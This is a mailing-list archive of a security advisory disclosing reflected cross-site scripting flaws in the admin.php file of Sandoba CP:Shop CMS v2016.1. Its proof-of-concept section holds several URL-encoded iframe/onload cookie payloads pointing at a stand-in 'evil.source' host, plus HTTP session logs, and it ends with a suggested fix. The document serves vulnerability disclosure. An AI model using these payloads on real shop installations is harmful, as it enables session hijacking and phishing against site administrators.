[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2018-03-27 14:08:00
Message-ID: 355befdd-5253-dd3d-b325-92f4177155eb () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2122
Release Date:
=============
2018-03-02
Vulnerability Laboratory ID (VL-ID):
====================================
2122
Common Vulnerability Scoring System:
====================================
3.4
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
CP:Shop is the basis for your lasting success on the Internet. The system was designed so that \
customers are optimally supplied with information about articles, special promotions and \
discounts on the one hand, while the shop operator is at the same time subjected to essential \
work steps through automation.
(Copy of the homepage: https://www.sandoba.de/produkte/shop-software-cpshop/)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site \
vulnerabilities in the official Sandoa CP:Shop v2016.1 CMS.
Vulnerability Disclosure Timeline:
==================================
2018-03-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A non-persistent cross site scripting vulnerabilities has been discovered in the official \
Sandoa CP:Shop v2016.1 Content Management System. The vulnerability allows remote attackers to \
inject own malicious script codes with non-persistent attack vector to compromise browser to \
web-application requests.
The security vulnerability is located in the `admin.php` files of the `./cpshop/` module. \
Remote attackers are able to inject own script codes to the client-side requested vulnerable \
web-application parameters. The attack vector of the vulnerability is non-persistent and the \
request method to inject/execute is GET. The vulnerabilities are classic client-side cross \
site scripting vulnerability.
Successful exploitation of the vulnerability results in session hijacking, non-persistent \
phishing attacks, non-persistent external redirects to malicious source and non-persistent \
manipulation of affected or connected application modules.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] admin.php
Vulnerable Parameter(s):
[+] path
[+] search
[+] rename
[+] dir
Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without privileged user account \
and with low user interaction. For security demonstration or to reproduce the vulnerability \
follow the provided information and steps below to continue.
PoC: Exploitation
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&form[path]=.
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=TEST&form[path]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
%22%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&select_box=2
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=
de%3E%22%3Ciframe%20src=evil.source%3E&form[path]=modules%2Ffast_gallery%2Flanguages
PoC: Session Logs
Status: 200[OK]
GET https://cpshop.localhost:8080admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[pa \
th]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes Mime \
Type[text/html] Request Header:
Host[cpshop.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0] Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
X-Requested-With[XMLHttpRequest]
Referer[https://cpshop.localhost:8080admin.php]
Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; \
PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes] \
Connection[keep-alive] Response Header:
server[Apache/2.4.27]
x-powered-by[PHP/7.0.20]
expires[Thu, 19 Nov 1981 08:52:00 GMT]
cache-control[no-store, no-cache, must-revalidate]
pragma[no-cache]
x-frame-options[SAMEORIGIN]
content-encoding[gzip]
set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/]
content-type[text/html; charset=utf-8]
X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://cpshop.localhost:8080/evil.source
Mime Type[text/html]
Request Header:
Host[cpshop.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
Referer[https://cpshop.localhost:8080admin.php]
Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; \
PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes] \
Connection[keep-alive] Upgrade-Insecure-Requests[1]
Response Header:
server[Apache/2.4.27]
location[http://cpshop.localhost:8080]
content-length[296]
content-type[text/html; charset=iso-8859-1]
X-Firefox-Spdy[h2]
-
Status: pending[]
GET http://cpshop.localhost:8080/cpshop/admin.php?file=news&clean=yes&ajax=yes&form%5Bsearch%5D=
http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B
onl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
Mime Type[unknown]
Request Header:
Host[cpshop.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0] Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://cpshop.localhost:8080/cpshop/admin.php]
Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
DNT[1]
-
14:06:37.847[179ms][total 538ms] Status: 200[OK]
GET http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost \
:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news \
Mime Type[text/html]
Request Header:
Host[cpshop.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://cpshop.localhost:8080/cpshop/admin.php]
Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache/2.4.27]
X-Powered-By[PHP/7.0.20]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Content-Encoding[gzip]
Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/]
Upgrade[h2c]
Connection[Upgrade, Keep-Alive]
Keep-Alive[timeout=5, max=100]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=utf-8]
Reference(s):
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=
Solution - Fix & Patch:
=======================
The cross site vulnerabilities can be resolved by implementation of htmlentities and a secure \
input restriction of characters.
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities in the \
web-application are estimated as medium (cvss 3.4).
Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - \
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability Labs or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for incidental or consequential damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data. We have no \
need for criminal activities or membership requests. We do not publish advisories or \
vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or \
individuals. We do not publish trade researcher mails, phone numbers, conversations or \
anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - \
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic